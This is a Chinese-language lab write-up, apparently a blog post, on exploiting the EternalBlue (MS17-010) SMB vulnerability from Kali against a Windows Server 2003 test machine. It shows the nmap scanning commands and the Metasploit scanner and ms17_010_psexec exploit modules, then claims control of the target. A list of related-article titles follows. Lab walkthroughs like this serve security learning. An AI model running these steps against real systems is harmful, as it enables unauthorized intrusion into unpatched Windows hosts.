Linux(kali)永恒之蓝(ms17-010)漏洞实验
0.准备实验机
一台kali的,一台windows。
windows这台有永恒之蓝漏洞即可,2003,2008都可以。
我是用的cn_win_srv_2003_r2_enterprise_with_sp2_vl_cd1_X13-46432.iso
,装的是Windows Server 2003 Standard x64 Edition
1.查看ip
1.1查看kali机的ip
ifconfig
1.2查看windows机的ip
ipconfig
2.扫描漏洞
nmap 192.168.206.0/24 #扫描指定网段中的ip、端口情况
nmap -sV -O 192.168.206.132 #查看该ip主机的操作系统
nmap --script=vuln 192.168.206.132 #对指定ip进行漏洞扫描
可以查看到192.168.206.132
的主机是windows2003
,并且对该ip扫描漏洞可以查看到ms17-010
漏洞。
3.开始攻击
3.1进入msf安全框架
msfconsole #进入msf安全框架
help #查看帮助
3.2查找攻击模块
search ms17-010
可以看到有五个模块供我们选择。
3.3使用扫描模块
use auxiliary/scanner/smb/smb_ms17_010
options #查看有哪些选项
可以看到右边有一些yes
和no
,用一个例子来描述就是,yes
是我们填表时的必填项,no
是选填项,所以我们观察yes
对应行的左边,有一个RHOSTS
和no
一样是空白的,那个便是需要我们填写的内容。
同时也可以看后面的Description
,The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
,所以这里填目标ip
。
set RHOSTS 192.168.206.132
options
再次使用options
命令可以看到刚刚空缺的位置已经填上了。
run
这两行英语啥意思自己可以翻译一下,我的理解就是主机里有ms17-010
漏洞,并且和msf安全框架中的漏洞匹配度是100%
3.4使用攻击模块
search ms17-010
use exploit/windows/smb/ms17_010_psexec
此时就已经进入攻击模块了,然后像进入扫描模块一样,我们把必填项都填上。
options
set RHOSTS 192.168.206.132
options
此时可以运行了。
run
这个时候我们已经控制到windows2003
了,可以查看ip和当前路径~
over!
Linux(kali)永恒之蓝(ms17-010)漏洞实验相关推荐
- 三、Kali Linux复现永恒之蓝漏洞
配置需求: 1.攻击机:Kali Linux (IP:192.168.1.100) 2.目标靶机:Winodws7 3.同一局域网 前言: 只知道目标靶机处于同一局域网的情况下,对目标靶机进行渗透攻击 ...
- 关于NSA的EternalBlue(永恒之蓝) ms17-010漏洞利用
好久没有用这个日志了,最近WannaCry横行,媒体铺天盖地的报道,我这后知后觉的才想起来研究下WannaCry利用的这个原产于美帝的国家安全局发现的漏洞,发现漏洞不说,可以,自己偷偷 ...
- 记一次MSF永恒之蓝入侵win7系统实验
目录 1.环境搭建 2.实验开始 1# 保证两个主机之间可以ping通 2# kali打开msfconsole 3# 由于目标为win7系统,我们选择永恒之蓝漏洞攻击(ms17-010) 4# 获取目 ...
- 【漏洞复现】永恒之蓝 MS17-010 远程溢出漏洞(CVE-2017-0143)
文章目录 声明 前言 一.漏洞原理简述 二.漏洞代码深层解析 三.实验步骤 四.漏洞补丁 总结 声明 本篇文章仅用于技术研究与技术学习,切勿用于非授权下攻击行为,切记! 前言 Windows7 存在 ...
- 【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)
目录 1 MSF框架 1.1 MSF简介 1.2 MSF五大模块类型 1.3 渗透攻击步骤 1.4 小结 2 实验简介 2.1 永恒之蓝简介 2.2 实验环境 2.3 实验目的 3 实验前准备 3.1 ...
- 永恒之蓝漏洞复现测试
永恒之蓝MS17-010漏洞复现及利用 一.什么是永恒之蓝? 永恒之蓝漏洞是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机. SMB(全称是Server Me ...
- 09永恒之蓝与永恒之黑的复现
一.永恒之蓝 1.简介 2017年3月14日,微软公布SMB远程代码执行漏洞(MS17-010),又称永恒之蓝,该漏洞在 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时 ...
- 永恒之蓝(EternalBlue)实例复现
一.前言 2017年4月的时候,Shadow broker在网络上公布一批NSA(美国国家安全局)使用的网络武器,其中就包含一种工具,可以远程控制有漏洞的任何一台windows机器,正是这些工具的问世 ...
- Metasploit渗透框架介绍及永恒之蓝复现
Metasploit渗透框架介绍及永恒之蓝复现 一.Metasploit渗透框架介绍 1.1 名词解释 1.2 MSF简介 1.3 MSF框架结构 1.4 MSF命令汇总 1.4.1 常用命令 1.4 ...
最新文章
- window.open(url?param=+paramvalue) 服务端 乱码问题解决
- GitHub上大热的Deep Photo终于有TensorFlow版了!
- MVC三层+会话层+线程安全+抽象工厂+DataBase First的基础框架
- html 商品展示框
- Linux cron 定时执行任务
- dnscat2搭建dns隧道
- python模块安装路径
- 专业的软件安装包可以这样做!
- vim 函数列表插件
- php 读取或导出到Excel / CSV (附utf8、gbk 编码转换)
- 支付宝、微信收款码明年3月1日起将禁止商用?系误读!
- Visual Studio 2012 实用快捷键
- DBCC CHECKIDENT 和SET IDENTITY_INSERT table OFF
- 《ARM64体系结构编程与实践》开始预订了
- html ckplayer.swf,Flash基础入门之ckplayer.js视频播放插件
- 什么是TypeScript
- AS01 创建固定资产卡片 BAPI_FIXEDASSET_CREATE1
- android espresso跨程序,在Espresso Android中正确使用IdlingResource的方法
- 怎么开发一个小程序?从零开始手把手教你
- 数字图像matlab边缘检测(一)
热门文章
- Web项目错误记录java.sql.SQLException: Incorrect integer value: ‘aa‘ for column ‘password‘
- win7修改本地连接 MTU值的方法
- 国嵌linux内核编程,国嵌视频学习笔记---linux内核开发1
- PCB布线时应该注意的问题
- Android Studio:一个简单的米英尺单位转化app的实现过程
- python音乐同步歌词_使用python扫描本地音乐并下载歌词
- html画圆圈原理,Html - 圆圈border
- js 如何快速找出找出两个数组中相同的部分
- 你能清洗西雅图所有的窗户吗?
- SpringBoot框架分层设计解析